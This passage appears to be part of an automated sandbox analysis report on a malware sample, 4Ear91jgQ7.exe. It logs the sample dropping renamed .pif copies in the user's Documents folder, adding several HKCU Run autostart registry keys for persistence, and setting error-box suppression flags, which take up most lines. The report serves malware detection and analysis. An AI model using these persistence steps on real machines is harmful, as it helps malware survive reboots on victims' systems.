            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pifJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Documents\4Ear91jgQ7.pif.pifJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Documents\4Ear91jgQ7.pifJump to dropped file

            Boot Survival

            barindex
            Creates multiple autostart registry keys
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7Jump to behavior
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pifJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pif.pif.pif.pif
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pif.pif
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pif.pif.pif
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pif.pif.pif.pif.pif
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7Jump to behavior
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7Jump to behavior
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pifJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pifJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pif.pif
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pif.pif
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pif.pif.pif
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pif.pif.pif
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pif.pif.pif.pif
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pif.pif.pif.pif
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pif.pif.pif.pif.pif
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4Ear91jgQ7.pif.pif.pif.pif.pif
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess information set: NOOPENFILEERRORBOX
